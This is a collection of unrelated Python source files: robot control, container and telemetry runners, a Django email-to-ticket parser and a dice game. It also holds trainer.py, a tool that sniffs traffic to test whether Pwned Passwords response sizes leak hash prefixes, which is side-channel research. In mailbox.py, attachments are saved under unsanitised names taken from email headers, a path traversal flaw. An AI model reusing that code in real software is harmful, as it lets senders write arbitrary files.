#print('LY =',LY)
#print('LeftY = ',LeftY)
elif event.code == 0: # Left analogue Horizontal stick
# The analogue stick gives a value between 0-255
# Convert the value to 0-127 for left
# and 0-127 for right
LX = event.value
if LX < 128: # Left
LeftX_L = 127 - LX
#print('LX =',LX)
#print('LeftX_Left = ',LeftX_L)
if LX > 128: # Right
LeftX_R = LX - 128
#print('LX = ',LX)
#print('LeftX_Right = ',LeftX_R)
if LX == 128: # Make sure both values are zero if stick is in the centre
LeftX_L = 0
LeftX_R = 0
# Prepare the values to send to the motors
if LeftY == 0: #Turn on the spot if not going forwards or backwards
if LX <= 128: # Turn Left
Leftmotor = -LeftX_L # Reverse motor to turn on the spot
Rightmotor = LeftX_L
elif LX >= 127: # Turn Right
Leftmotor = LeftX_R
Rightmotor = -LeftX_R # Reverse motor to turn on the spot
elif LY <= 128: # Forwards
print ('Forwards')
Leftmotor = LeftY - LeftX_L # Mix steering values
if Leftmotor <1: # Stop motor going backwards
Leftmotor = 0;
Rightmotor = LeftY - LeftX_R # Mix steering values
if Rightmotor <1: # Stop motor going backwards
Rightmotor = 0;
elif LY >= 127: # Backwards
print('Backwards')
Leftmotor = LeftY + LeftX_L # Mix steering values
if Leftmotor >-1: # Stop motor going forwards
Leftmotor = 0;
Rightmotor = LeftY + LeftX_R # Mix steering values
if Rightmotor >-1: # Stop motor going forwards
Rightmotor = 0;
if turbo == True: # Double speed for turbo
LM = Leftmotor * 2
RM = Rightmotor * 2
else: # Normal speed
LM = Leftmotor
RM = Rightmotor
if LM != LM_OLD or RM != RM_OLD: # Only print motor speeds if they have changed
print ('Left motor =',LM)
print ('Right motor =',RM)
LM_OLD = LM
RM_OLD = RM
# Set motor speed and direction
if invertX == True: # Reverse steering controls
#print('Reverse steering')
redboard.M2_8bit(RM)
redboard.M1_8bit(LM)
else: # Normal steering controls
#print ('Normal steering')
redboard.M2_8bit(LM)
redboard.M1_8bit(RM)
|
ShifterRunner.py
|
import os
from threading import Thread
from subprocess import Popen, PIPE
from select import select
class ShifterRunner:
"""
    This class provides the container interface for Shifter.
"""
def __init__(self, logger=None):
"""
        Inputs: optional logger
"""
self.logger = logger
self.containers = []
self.threads = []
def _readio(self, p, job_id, queues):
cont = True
last = False
while cont:
rlist = [p.stdout, p.stderr]
x = select(rlist, [], [], 1)[0]
for f in x:
if f == p.stderr:
error = True
else:
error = False
line = f.readline().decode('utf-8')
if len(line) > 0:
self.logger.log_lines([{'line': line, 'error': error}])
if last:
cont = False
if p.poll() is not None:
last = True
for q in queues:
q.put(['finished', job_id, None])
def get_image(self, image):
# Do a shifterimg images
lookcmd = ['shifterimg', 'lookup', image]
proc = Popen(lookcmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
id = stdout.decode('utf-8').rsplit()
        if not id:
cmd = ['shifterimg', 'pull', image]
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
            # Look the image up again now that it has been pulled, to get its id
            proc = Popen(lookcmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
id = stdout.decode('utf-8').rsplit()
return id
def run(self, job_id, image, env, vols, labels, queues):
cmd = [
'shifter',
'--image=%s' % (image)
]
        # Should we do something with the labels?
newenv = os.environ
for e in env.keys():
newenv[e] = env[e]
proc = Popen(cmd, bufsize=0, stdout=PIPE, stderr=PIPE, env=newenv)
out = Thread(target=self._readio, args=[proc, job_id, queues])
self.threads.append(out)
out.start()
self.containers.append(proc)
return proc
def remove(self, c):
# Kill process
c.kill()
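

def _example_usage():
    """Illustrative sketch only (never called): launch a job in a Shifter
    container and wait for the reader thread to report completion. The image
    name, job id and logger below are placeholders."""
    from queue import Queue

    class PrintLogger:
        def log_lines(self, lines):
            for entry in lines:
                print(entry['line'], end='')

    runner = ShifterRunner(logger=PrintLogger())
    done = Queue()
    runner.run('job-1', 'ubuntu:latest', {'FOO': 'bar'}, [], {}, [done])
    print(done.get())  # ['finished', 'job-1', None]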
|
RicardoBackend.py
|
import multiprocessing
import argparse
import signal
import sys
import redis
from Interfaces import commandlineinterface
from Interfaces import flaskinterface
from RicardoHandler import serialmanager
from RicardoHandler import telemetryhandler
from RicardoHandler import telemetrylogger
# Argument Parsing
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--device", required=True, help="Ricardo Serial Port", type=str)
ap.add_argument("-b", "--baud", required=False, help="Serial Port Baud Rate", type=int,default=115200)
ap.add_argument("--flask-host", required=False, help="flask host", type=str,default="0.0.0.0")
ap.add_argument("--flask-port", required=False, help="flask Port", type=int,default = 1337)
ap.add_argument("-v", "--verbose", required=False, help="Enable Verbose Mode", action='store_true')
ap.add_argument("--redis-host", required=False, help="redis host", type=str,default = "localhost")
ap.add_argument("--redis-port", required=False, help="redis port", type=int,default = 6379)
ap.add_argument('-l','--logger', required=False, help="Enable Telemetry logging",action='store_true',default=False)
argsin = vars(ap.parse_args())
def exitBackend(proclist):
for key in proclist:
print("Killing: " + key + " Pid: " + str(proclist[key].pid))
proclist[key].terminate()
proclist[key].join()
proclist = {}
sys.exit(0)
def checkRedis():
try:
server = redis.Redis(host=argsin["redis_host"],port=argsin["redis_port"])
server.ping()
except redis.exceptions.ConnectionError:
errormsg = "[ERROR] -> Redis server not found at host:'" + argsin["redis_host"] + "' port:" + str(argsin["redis_port"]) + "\nPlease check redis is running"
sys.exit(errormsg)
def startSerialManager(args):
serman = serialmanager.SerialManager(device = args["device"],
baud = args["baud"],
redishost = args["redis_host"],
redisport=args["redis_port"])
serman.run()
def startTelemetryHandler(args,taskid):
telemetrytask = telemetryhandler.TelemetryHandler(redishost = args["redis_host"],
redisport=args["redis_port"],
clientid=taskid)
telemetrytask.run()
def startTelemetryLogger(args):
logger = telemetrylogger.TelemetryLogger(redishost=args['redis_host'],
redisport=args['redis_port'],
filename="telemetry_log")
logger.run()
if __name__ == '__main__':
proclist = {}
#check redis server is running
checkRedis()
proclist['serialmanager'] = multiprocessing.Process(target=startSerialManager,args=(argsin,))
proclist['serialmanager'].start()
#start telemetry handler process
telemetrytask_id = "LOCAL:TELEMETRYTASK"
proclist['telemetryhandler'] = multiprocessing.Process(target=startTelemetryHandler,args=(argsin,telemetrytask_id,))
proclist['telemetryhandler'].start()
#start flask interface process
proclist['flaskinterface'] = multiprocessing.Process(target=flaskinterface.startFlaskInterface,args=(argsin['flask_host'],
argsin['flask_port'],
argsin['redis_host'],
argsin['redis_port'],))
proclist['flaskinterface'].start()
if (argsin['logger']):
proclist['telemetrylogger'] = multiprocessing.Process(target=startTelemetryLogger,args=(argsin,))
proclist['telemetrylogger'].start()
c = commandlineinterface.CommandLineInterface(redishost=argsin['redis_host'],
redisport=argsin['redis_port'],
)
c.cmdloop()
exitBackend(proclist)
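
# Illustrative only (hypothetical worker, not part of this backend): any new
# background task would follow the same pattern as the handlers above -- wrap
# it in a start function and register its Process in proclist so that
# exitBackend() can terminate and join it on shutdown:
#
#     def startMyWorker(args):
#         worker = myworker.MyWorker(redishost=args['redis_host'],
#                                    redisport=args['redis_port'])
#         worker.run()
#
#     proclist['myworker'] = multiprocessing.Process(target=startMyWorker, args=(argsin,))
#     proclist['myworker'].start()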
|
trainer.py
|
#!/usr/bin/env python3
########################################################################################
#
# Name: Trains a sniffer on what non-padded responses correspond to submitted
# hash prefixes.
#
# Written by Matt Weir
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#
# Contact Info: cweir@vt.edu
#
# trainer.py
#
#########################################################################################
# Including this to print error message if python < 3.0 is used
from __future__ import print_function
import sys
# Check for python3 and error out if not
if sys.version_info[0] < 3:
print("This program requires Python 3.x", file=sys.stderr)
sys.exit(1)
# Global imports
import argparse
import time
from multiprocessing import Process, Queue
import json
import traceback
# Local imports
from lib_query.query_process import launch_query_process
from lib_sniffer.training_sniffer import TrainingSniffer
from lib_query.hash_prefix import HashPrefix
## Parses the command line
#
# Responsible for parsing the command line.
#
# If you have any command line options that you want to add, they go here.
#
# All results are returned as a dictionary in 'program_info'
#
# Returns True if successful; the program exits if argparse catches a problem.
#
def parse_command_line(program_info):
# Keeping the title text to be generic to make re-using code easier
parser = argparse.ArgumentParser(
description= program_info['name'] +
', version: ' +
program_info['version'],
formatter_class = argparse.RawTextHelpFormatter
)
# filename to save the results to. If not specified, output to stdout
parser.add_argument(
'--filename',
'-f',
help = 'The filename to save results to. If not specified, will output to stdout',
metavar = 'FILE_NAME',
required = False,
default = program_info['filename']
)
# Start at the specified index, (vs 0), and append to a training set if it
# already exists
parser.add_argument(
'--start_prefix',
'-s',
help = 'Starts querying from the specified prefix, and will append to a training file if it already exists',
metavar = 'START_HASH_PREFIX',
required = False,
default = program_info['start_prefix']
)
# The default time chunks the sniffer should sniff for
parser.add_argument(
'--time_interval',
'-t',
help = 'The default time interval (seconds) the sniffer should run for when training on each hash prefix. Default is ' +str(program_info['time_interval']),
metavar = 'SECONDS',
required = False,
default = program_info['time_interval']
)
# The minimum number of samples to collect for each hash prefix
parser.add_argument(
'--num_samples',
'-n',
        help = 'The minimum number of samples to collect for each hash prefix. Default is ' +str(program_info['num_samples']),
metavar = 'MINIMUM_SAMPLES',
required = False,
default = program_info['num_samples']
)
# The interface to sniff on
parser.add_argument(
'--interface',
'-i',
help = 'The network interface to sniff on. Default will sniff on all interfaces',
metavar = 'INTERFACE_ID',
required = False,
default = program_info['interface']
)
# Parse all the args and save them
args=parser.parse_args()
program_info['filename'] = args.filename
program_info['start_prefix'] = args.start_prefix
program_info['time_interval'] = args.time_interval
program_info['num_samples'] = args.num_samples
program_info['interface'] = args.interface
return True
## Main function, starts everything off
#
def main():
# Information about this program
program_info = {
# Program and Contact Info
'name':'Pwned Passwords Padding Trainer',
'version': '1.0',
'author':'Matt Weir',
'contact':'cweir@vt.edu',
'filename': None,
'start_prefix': None,
'time_interval': 10,
'num_samples': 20,
'interface': None,
}
# Parsing the command line
if not parse_command_line(program_info):
# There was a problem with the command line so exit
print("Exiting...",file=sys.stderr)
return
print(program_info['name'],file=sys.stderr)
print("Version: " + str(program_info['version']),file=sys.stderr)
print('',file=sys.stderr)
# Spawn off the querying process
query_ptoc_queue = Queue()
query_ctop_queue = Queue()
query_process = Process(target=launch_query_process, args=("https://api.pwnedpasswords.com/range/", query_ptoc_queue, query_ctop_queue,))
query_process.daemon = True
query_process.start()
# Create the TrainingSniffer instance
sniffer = TrainingSniffer(program_info['time_interval'], program_info['num_samples'], program_info['interface'])
# Create the hash_prefix object that will specify the current prefix to
# target
    # If start_prefix was specified on the command line:
if program_info['start_prefix'] != None:
initial_prefix = program_info['start_prefix']
prefix_len = len(program_info['start_prefix'])
# Otherwise, start at the default '00000'
else:
initial_prefix = '00000'
prefix_len = 5
hash_prefix = HashPrefix(initial= initial_prefix, length= prefix_len)
    # If a start prefix is not specified, create/erase the save file
    # (this only applies when a save file was specified)
if program_info['filename'] != None:
if program_info['start_prefix'] == None:
try:
open(program_info['filename'], 'w').close()
except:
pass
# Used to specify if the queries should continue
keep_querying = True
try:
# Start querying the pwned passwords service
while (keep_querying):
# Start querying the hash prefix
query_ptoc_queue.put({'action':'query', 'prefix':hash_prefix.get_value()})
# Wait a short delay to give the query time to start
time.sleep(5)
# Start collecting statistics on the queries
results = sniffer.start_training()
# To keep the save file smaller, only save the minimum and maximum value
#minimum_size = min(results)
#maximum_size = max(results)
print()
print(hash_prefix.get_value())
print(results)
# Save to file if a file was specified
if program_info['filename'] != None:
save_results ={hash_prefix.get_value():results}
try:
save_file = open(program_info['filename'], 'a')
json.dump(save_results, save_file)
save_file.write("\n")
save_file.close()
except:
print("Error trying to write to the save file")
raise
# Increment the hash prefix
# If we are at the end of the keyspace, stop querying
if hash_prefix.increment() != 0:
keep_querying = False
except Exception as msg:
traceback.print_exc()
print ("Exception: " + str(msg))
query_ptoc_queue.put({'action':'stop'})
# Clean up and exit
query_process.join()
if program_info['filename'] != None:
save_file.close()
if __name__ == "__main__":
main()
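# Illustrative sketch (not part of the original trainer): reading back a file
# produced by the loop above. Each line is an independent JSON object of the
# form {"<hash_prefix>": <results>}, so the file can be parsed line by line.
# The function name is a placeholder and is never called by this script.
def load_training_file(filename):
    """Yield (hash_prefix, results) pairs from a saved training file"""
    with open(filename, 'r') as save_file:
        for line in save_file:
            line = line.strip()
            if line:
                entry = json.loads(line)
                for hash_prefix, results in entry.items():
                    yield hash_prefix, results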
|
request.py
|
import sys
import requests
import threading
import traceback
from lxml import etree
from photo_dl.log import log
from requests.adapters import HTTPAdapter
from photo_dl.config import headers
from photo_dl.config import timeout
from photo_dl.config import max_retries
from photo_dl.config import threads as _thread_size
signal_flag = True
def set_signal():
global signal_flag
signal_flag = False
print(signal_flag)
def request(url, html_flag=True):
session = requests.Session()
session.mount('http://', HTTPAdapter(max_retries=max_retries))
session.mount('https://', HTTPAdapter(max_retries=max_retries))
response = session.get(url=url, headers=headers, timeout=timeout)
if html_flag:
response.encoding = 'utf-8'
return etree.HTML(response.text)
return response
class RequestThread(threading.Thread):
def __init__(self, url, info=None, html_flag=True):
threading.Thread.__init__(self)
self.url = url
self.info = info
self.html_flag = html_flag
self.response = None
def run(self):
try:
self.response = request(self.url, self.html_flag)
except:
log('%s\n%s' % (self.url, traceback.format_exc()))
class MultiRequest:
def __init__(self, urls, name='', progress=True, html_flag=True, thread_size=_thread_size):
self.urls = urls
self.name = name
self.progress = progress
self.html_flag = html_flag
self.thread_size = thread_size
self.threads = []
self.count = 1
def get_generator(self):
for url in self.urls:
yield url
def put_request(self):
global signal_flag
generator = self.get_generator()
while signal_flag:
if threading.activeCount() < self.thread_size:
url = next(generator, None)
if url is None:
break
thread = RequestThread(url['url'], url.get('info'), self.html_flag)
thread.start()
self.threads.append(thread)
if self.progress:
print('\r[%d / %d] %s' % (self.count, len(self.urls), self.name), end='')
self.count += 1
def run(self):
if len(self.urls) == 0:
return []
_threads = []
try:
put_thread = threading.Thread(target=self.put_request)
put_thread.start()
put_thread.join()
for thread in self.threads:
thread.join()
_threads.append(thread)
except SystemExit:
sys.exit()
except:
log('%s\n%s' % (self.name, traceback.format_exc()))
return _threads
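# Illustrative sketch (not part of the original module): how MultiRequest is
# typically driven. The URLs and the XPath below are placeholders; each entry
# must be a dict with a 'url' key and an optional 'info' key.
def _multi_request_sketch():
    urls = [
        {'url': 'https://example.com/page/1', 'info': 'page 1'},
        {'url': 'https://example.com/page/2', 'info': 'page 2'},
    ]
    threads = MultiRequest(urls, name='example', html_flag=True).run()
    for thread in threads:
        if thread.response is not None:
            # with html_flag=True the response is an lxml HTML tree
            print(thread.info, thread.response.xpath('//title/text()'))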
|
EncodingDataParallel.py
|
# -*- coding: utf-8 -*-
# @Author : DevinYang(pistonyang@gmail.com)
"""Refers to 'https://github.com/zhanghang1989/PyTorch-Encoding/blob/master/encoding/parallel.py'"""
__all__ = ['EncodingDataParallel', 'EncodingCriterionParallel']
import threading
import torch
import functools
import torch.cuda.comm as comm
from torch.nn import Module
from itertools import chain
from torch.autograd import Function
from torch.nn.parallel.parallel_apply import get_a_var, parallel_apply
from torch.nn.parallel._functions import ReduceAddCoalesced, Broadcast
from torch.nn.parallel.scatter_gather import scatter_kwargs, gather
from torch.nn.parallel.replicate import replicate
from torch.nn.parallel.data_parallel import _check_balance
from torch.cuda._utils import _get_device_index
from torch._utils import ExceptionWrapper
class EncodingParallel(Module):
def __init__(self, module, device_ids=None, output_device=None, dim=0):
super(EncodingParallel, self).__init__()
if not torch.cuda.is_available():
self.module = module
self.device_ids = []
return
if device_ids is None:
device_ids = list(range(torch.cuda.device_count()))
if output_device is None:
output_device = device_ids[0]
self.dim = dim
self.module = module
self.device_ids = list(map(lambda x: _get_device_index(x, True), device_ids))
self.output_device = _get_device_index(output_device, True)
        self.src_device_obj = torch.device("cuda:{}".format(self.device_ids[0]))
_check_balance(self.device_ids)
if len(self.device_ids) == 1:
self.module.cuda(device_ids[0])
def replicate(self, module, device_ids):
return replicate(module, device_ids, not torch.is_grad_enabled())
def scatter(self, inputs, kwargs, device_ids):
return scatter_kwargs(inputs, kwargs, device_ids, dim=self.dim)
class EncodingDataParallel(EncodingParallel):
"""Implements data parallelism at the module level.
This container parallelizes the application of the given module by
splitting the input across the specified devices by chunking in the
batch dimension.
In the forward pass, the module is replicated on each device,
and each replica handles a portion of the input. During the backwards pass, gradients from each replica are summed into the original module.
Note that the outputs are not gathered, please use compatible
:class:`encoding.parallel.DataParallelCriterion`.
The batch size should be larger than the number of GPUs used. It should
also be an integer multiple of the number of GPUs so that each chunk is
the same size (so that each GPU processes the same number of samples).
Args:
module: module to be parallelized
device_ids: CUDA devices (default: all devices)
Reference:
Hang Zhang, Kristin Dana, Jianping Shi, Zhongyue Zhang, Xiaogang Wang, Ambrish Tyagi,
        Amit Agrawal. "Context Encoding for Semantic Segmentation."
*The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) 2018*
Example::
>>> net = encoding.nn.DataParallelModel(model, device_ids=[0, 1, 2])
>>> y = net(x)
"""
def forward(self, *inputs, **kwargs):
if not self.device_ids:
return self.module(*inputs, **kwargs)
for t in chain(self.module.parameters(), self.module.buffers()):
if t.device != self.src_device_obj:
raise RuntimeError("module must have its parameters and buffers "
"on device {} (device_ids[0]) but found one of "
"them on device: {}".format(self.src_device_obj, t.device))
inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
if len(self.device_ids) == 1:
return self.module(*inputs, **kwargs)
replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
outputs = self.parallel_apply(replicas, inputs, kwargs)
return outputs
def parallel_apply(self, replicas, inputs, kwargs):
return parallel_apply(replicas, inputs, kwargs, self.device_ids[:len(replicas)])
class EncodingCriterionParallel(EncodingParallel):
def forward(self, inputs, *targets, **kwargs):
        # inputs should already be scattered
        # scatter the targets instead
if not self.device_ids:
return self.module(inputs, *targets, **kwargs)
targets, kwargs = self.scatter(targets, kwargs, self.device_ids)
if len(self.device_ids) == 1:
return self.module(inputs, *targets, **kwargs)
replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
outputs = self.criterion_apply(replicas, inputs, targets, kwargs)
return ReduceAddCoalesced.apply(self.device_ids[0], len(outputs), *outputs) / len(outputs)
def criterion_apply(self, replicas, inputs, targets, kwargs):
return criterion_parallel_apply(replicas, inputs, targets, kwargs, self.device_ids[:len(replicas)])
def criterion_parallel_apply(modules, inputs, targets, kwargs_tup=None, devices=None):
assert len(modules) == len(inputs)
assert len(targets) == len(inputs)
if kwargs_tup is not None:
assert len(modules) == len(kwargs_tup)
else:
kwargs_tup = ({}, ) * len(modules)
if devices is not None:
assert len(modules) == len(devices)
else:
devices = [None] * len(modules)
devices = list(map(lambda x: _get_device_index(x, True), devices))
lock = threading.Lock()
results = {}
grad_enabled = torch.is_grad_enabled()
def _worker(i, module, input, target, kwargs, device=None):
torch.set_grad_enabled(grad_enabled)
if device is None:
device = get_a_var(input).get_device()
try:
with torch.cuda.device(device):
if not isinstance(input, (list, tuple)):
input = (input, )
if not isinstance(target, (list, tuple)):
target = (target, )
output = module(*input, *target, **kwargs)
with lock:
results[i] = output
except Exception:
with lock:
results[i] = ExceptionWrapper(where="in replica {} on device {}".format(i, device))
if len(modules) > 1:
threads = [
threading.Thread(target=_worker, args=(i, module, input, target, kwargs, device))
            for i, (module, input, target, kwargs, device) in enumerate(zip(modules, inputs, targets, kwargs_tup, devices))
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
else:
        _worker(0, modules[0], inputs[0], targets[0], kwargs_tup[0], devices[0])
outputs = []
for i in range(len(inputs)):
output = results[i]
if isinstance(output, ExceptionWrapper):
output.reraise()
outputs.append(output)
return outputs
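# Illustrative sketch (not part of the original module): pairing the two
# containers, in the spirit of the docstring example above. The model,
# criterion, inputs, targets and device ids are placeholders supplied by the
# caller; nothing here is executed on import.
def _encoding_parallel_sketch(model, criterion, x, y, device_ids=(0, 1)):
    model = EncodingDataParallel(model, device_ids=list(device_ids))
    criterion = EncodingCriterionParallel(criterion, device_ids=list(device_ids))
    outputs = model(x)            # list of per-device outputs (not gathered)
    loss = criterion(outputs, y)  # per-device losses reduced to a single value
    loss.backward()
    return loss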
|
mailbox.py
|
import poplib, email, re, datetime, pytz, threading, time, os, random
from django.db import models
from django.conf import settings
from urllib.parse import quote
from models import ticket, uploaded_file
class OneEmail(models.Model):
uniqueid = models.CharField("Unique ID: ", max_length=100, null=False, blank=False, unique=True)
received = models.DateTimeField("received on", null=False, blank=False)
fromfield = models.CharField("Sender field", max_length=200, null=True, blank=True, default=None)
fromemail = models.EmailField("Sender email", max_length=100, null=True, blank=True, default=None)
subject = models.CharField("Subject", max_length=150, null=True, blank=True, default=None)
body = models.TextField("Body", null=True, blank=True, default=None)
def __init__(self, *args, **kwargs):
return super().__init__(*args, **kwargs)
def create(uniqueid, received, fromfield, subject, body):
match = re.search(r'<([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)>$', fromfield)
if match is None:
fromemail = None
else:
fromemail = match.group(1)
try:
obj = OneEmail.objects.create(uniqueid=uniqueid, received=received,
fromfield=fromfield, fromemail=fromemail, subject=subject, body=body)
except Exception as e:
print(e)
return None
return obj
def parseEmail(self):
if self.fromemail == settings.HELP_REQUEST_EMAIL:
organization="None"
name="None"
email=settings.INBOUND_USERNAME
subject="None"
body="None"
regex = re.compile(settings.HELP_REQUEST_REGEX_FROM)
m = regex.search(self.body)
if m is None:
return False
email_address = m.group('email')
phone_number = m.group('phone')
name = m.group('username')
regex = re.compile(settings.HELP_REQUEST_REGEX_SUBJECT_BODY)
m = regex.search(self.body)
if m is None:
return False
subject = re.sub('=20$', '', m.group('subject').replace('=\n', ''))
body = re.sub('=20$', '', m.group('body').replace('=\n', '').replace('=20\n', '\n'))
regex = re.compile(settings.HELP_REQUEST_REGEX_ORGANIZATION)
            m = regex.search(self.body)
            if m is None:
                return False
            organization = m.group('organization')
try:
subm_ticket = ticket.Ticket.objects.create(companyname=organization, contactname=name, contactphone=phone_number, contactemail=email_address,
title=subject, description=body, senderipaddress="127.0.0.1")
subm_ticket.sendemail()
except Exception as e:
print(e)
return subm_ticket
return False
class EmailServer:
def __init__(self, emailadr=None, password=None):
if emailadr is None:
emailadr = settings.INBOUND_USERNAME
if password is None:
password = settings.INBOUND_PASSWORD
self.email = emailadr
self.password = password
self.enabled = True
return None
def conMail(self):
self.mailbox = poplib.POP3_SSL(settings.INBOUND_SERVER, settings.INBOUND_PORT)
self.mailbox.user(self.email)
self.mailbox.pass_(self.password)
def closeMail(self):
self.mailbox.quit()
def readEmail(self, number):
raw_email = b"\n".join(self.mailbox.retr(number)[1])
parsed_email = email.message_from_bytes(raw_email)
if parsed_email.is_multipart():
body=""
for b in [k.get_payload() for k in parsed_email.walk() if k.get_content_type() == 'text/plain']:
body=b
break
else:
body = parsed_email.get_payload()
keys = parsed_email.keys()
if 'Subject' in keys:
subject = parsed_email['Subject']
else:
subject = ''
if 'From' in keys:
fromfield = parsed_email['From']
else:
fromfield = ''
emailid = parsed_email['message-id']
        regex = re.compile(r' (?P<day>\d )')
        datestr = re.sub(regex, r' 0\g<day>', parsed_email['Date'])
        regex = re.compile(r' \(\w*\)')
        datestr = re.sub(regex, '', datestr)
try:
emaildate=datetime.datetime.strptime(datestr, '%a, %d %b %Y %H:%M:%S %z')
except Exception as e:
try:
emaildate=datetime.datetime.strptime(datestr, '%d %b %Y %H:%M:%S %z')
except Exception as ex:
                print(ex)
                # Fall back to the current time so emaildate is always defined
                emaildate = datetime.datetime.now(pytz.utc)
result = OneEmail.create(emailid, emaildate, fromfield, subject, body)
return result, emaildate, parsed_email
def readAllLastEmails(self):
self.conMail()
try:
listofemails = self.mailbox.list()
numberofemails = len(listofemails[1])
try:
latestemail = OneEmail.objects.all().order_by('-received')[0].received
except:
latestemail = datetime.datetime.now(pytz.utc) - datetime.timedelta(days=7)
count_new_emails = 0
for i in range(numberofemails, 0, -1):
message, emaildate, parsed_email = self.readEmail(i)
if emaildate < latestemail:
break
                if message:
tick = message.parseEmail()
if tick:
parse_attachments(tick, parsed_email)
count_new_emails += 1
finally:
self.closeMail()
return count_new_emails
ContinueCheckingEmail = True
def parse_attachments(tick, parsedemail):
for part in parsedemail.walk():
        if part['Content-Description'] is not None:
path = tick.get_files_folder()
addition = ""
            filepath = os.path.join(path, addition + part['Content-Description'])
            while os.path.exists(filepath):
                addition += str(random.randint(0, 9))
                filepath = os.path.join(path, addition + part['Content-Description'])
newFile = open(filepath, "wb")
newFile.write(part.get_payload(decode=True))
newFile.close()
upf = uploaded_file.UploadedFileTicket(for_ticket=tick, uplfile=filepath, filename=quote(os.path.basename(filepath)))
upf.save()
def checkEmail(timeout_secs, emailsrvr):
while(emailsrvr.enabled):
emailsrvr.readAllLastEmails()
time.sleep(timeout_secs)
def initiateEmailCheck(interval_minutes=10):
if settings.ENABLE_MAIL_CHECK:
emailsrvr = EmailServer()
thread = threading.Thread(target=checkEmail, kwargs={"timeout_secs": interval_minutes*60, 'emailsrvr': emailsrvr})
thread.emailsrvr = emailsrvr
thread.start()
return thread
else:
return False
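# Illustrative sketch (not part of the original module): the Django settings
# this module reads and how the periodic check is usually started. The values
# in the comment are placeholders; only the setting names and the named regex
# groups (email, phone, username, subject, body, organization) come from the
# code above.
#
#   INBOUND_SERVER = 'pop.example.com'      INBOUND_PORT = 995
#   INBOUND_USERNAME = 'help@example.com'   INBOUND_PASSWORD = '...'
#   HELP_REQUEST_EMAIL = 'forms@example.com'
#   HELP_REQUEST_REGEX_FROM / HELP_REQUEST_REGEX_SUBJECT_BODY /
#   HELP_REQUEST_REGEX_ORGANIZATION = regexes with the named groups above
#   ENABLE_MAIL_CHECK = True
def _mail_check_sketch():
    # Start the background thread that polls the mailbox every 10 minutes
    return initiateEmailCheck(interval_minutes=10)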
|
lock_ex.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# lock_ex.py
#
# An example of using a lock to synchronize access to shared data
import threading
X = 0 # A shared Value
COUNT = 1000000
# Primarily used to synchronize threads so that only one thread can make modifications to shared data at any given time.
X_Lock = threading.Lock() # A lock for synchronizing access to X and preventing a race condition
def addition():
global X
for i in range(COUNT):
X_Lock.acquire() # Acquire the lock
# Example critical section
try:
X += 1 # Critical Section
finally:
X_Lock.release() # Release the lock
def subtraction():
global X
for i in range(COUNT):
X_Lock.acquire()
try:
X -= 1
finally:
X_Lock.release()
t1 = threading.Thread(target=subtraction)
t2 = threading.Thread(target=addition)
t1.start()
t2.start()
t1.join()
t2.join()
print(X)
"""
Only one thread can successfully acquire the lock at any given time
If another thread tries to acquire the lock when its already in use. it gets blocked until the lock is released.
Threads and locks are little more than a formalization of what the underlying hardware actually does.That's both their great strength and their great weakness.
But all is not rosy,但是一切不都乐观
"""
|
client.py
|
#-------------Boilerplate Code Start-----
import socket
from tkinter import *
from threading import Thread
import random
from PIL import ImageTk, Image
screen_width = None
screen_height = None
SERVER = None
PORT = None
IP_ADDRESS = None
playerName = None
canvas1 = None
canvas2 = None
nameEntry = None
nameWindow = None
gameWindow = None
leftBoxes = []
rightBoxes = []
finishingBox = None
playerType = None
playerTurn = None
player1Name = 'joining'
player2Name = 'joining'
player1Label = None
player2Label = None
player1Score = 0
player2Score = 0
player1ScoreLabel = None
player2ScoreLabel = None
dice = None
rollButton = None
resetButton = None
winingMessage = None
winingFunctionCall = 0
#-------------Boilerplate Code End-----
# Boilerplate Code
def checkColorPosition(boxes, color):
for box in boxes:
boxColor = box.cget("bg")
if(boxColor == color):
return boxes.index(box)
return False
# Teacher Activity
def movePlayer1(steps):
global leftBoxes
boxPosition = checkColorPosition(leftBoxes[1:],"red")
if(boxPosition):
diceValue = steps
coloredBoxIndex = boxPosition
totalSteps = 10
remainingSteps = totalSteps - coloredBoxIndex
if(steps == remainingSteps):
for box in leftBoxes[1:]:
box.configure(bg='white')
global finishingBox
finishingBox.configure(bg='red')
global SERVER
global playerName
greetMessage = f'Red wins the game.'
SERVER.send(greetMessage.encode())
elif(steps < remainingSteps):
for box in leftBoxes[1:]:
box.configure(bg='white')
nextStep = (coloredBoxIndex + 1 ) + diceValue
leftBoxes[nextStep].configure(bg='red')
else:
print("Move False")
else:
# first step
leftBoxes[steps].configure(bg='red')
# Student Activity
def movePlayer2(steps):
global rightBoxes
# Moving to reverse order
tempBoxes = rightBoxes[-2::-1]
boxPosition = checkColorPosition(tempBoxes,"yellow")
if(boxPosition):
diceValue = steps
coloredBoxIndex = boxPosition
totalSteps = 10
remainingSteps = totalSteps - coloredBoxIndex
if(diceValue == remainingSteps):
for box in rightBoxes[-2::-1]:
box.configure(bg='white')
global finishingBox
finishingBox.configure(bg='yellow', fg="black")
global SERVER
global playerName
greetMessage = f'Yellow wins the game.'
SERVER.send(greetMessage.encode())
elif(diceValue < remainingSteps):
for box in rightBoxes[-2::-1]:
box.configure(bg='white')
nextStep = (coloredBoxIndex + 1 ) + diceValue
rightBoxes[::-1][nextStep].configure(bg='yellow')
else:
print("Move False")
else:
# first step
rightBoxes[len(rightBoxes) - (steps+1)].configure(bg='yellow')
def rollDice():
global SERVER
    # The six Unicode die faces, U+2680 through U+2685, written as escape sequences
diceChoices=['\u2680','\u2681','\u2682','\u2683','\u2684','\u2685']
#configure the label
value = random.choice(diceChoices)
global playerType
global rollButton
global playerTurn
